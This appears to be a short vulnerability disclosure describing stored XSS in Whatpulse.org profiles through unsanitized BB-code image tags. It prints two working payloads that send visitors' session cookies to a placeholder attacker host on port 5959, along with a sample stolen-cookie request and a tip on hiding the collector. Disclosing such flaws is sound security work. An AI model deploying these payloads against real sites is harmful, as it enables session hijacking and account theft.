Vulnerability in Whatpulse.Org profiles allows XSS and session hijacking
Whatpulse.org is a site that provides software to allower users to keep track
of how many keystrokes they have entered and 'pulse' them to the website and
view who has the most keys to date, etc. Whatpulse has a profile feature that
lets a user describe a little bit about themself to otherusers. The
vulnerability lies within the profile's allowance of unsanitized BB code. Here
is the example code:
[IMG=Javascript:document.write('><iframe src=http://attackerip:5959?' +
document.cookie + ' height=1% width=1%></iframe>');][/IMG]
[IMG="asdf" onMouseMove="document.write('-<iframe src=http://attackerip:5959?'
+ document.cookie + ' scrolling=no hspace=0 vspace=0 height=1% frameborder=0
width=1%></iframe>')""" style="Z-INDEX: 100; LEFT: 0px; POSITION: absolute;
TOP: 0px; height:2000px; width:8000px;"]asdf[/IMG]
there is a line break in the code. the top image tag works for IE users, the
second image tag works for mozilla users, the second one is triggered by moving
the mouse over the webpage. The above example will connect to the attacker's
ip address on a listening port, in this case 5959 and request a page, in this
case it will request a page named after their session cookie, giving the
attacker their session id. This of course can be modified to submit to a php
application helping to cloak the attacker from identification. When you submit
the user cookie you submit it in the Get request, for example:
GET /?PHPSESSID=eec5a9da58ecd36422e53dc89194af15; HTTP/1.1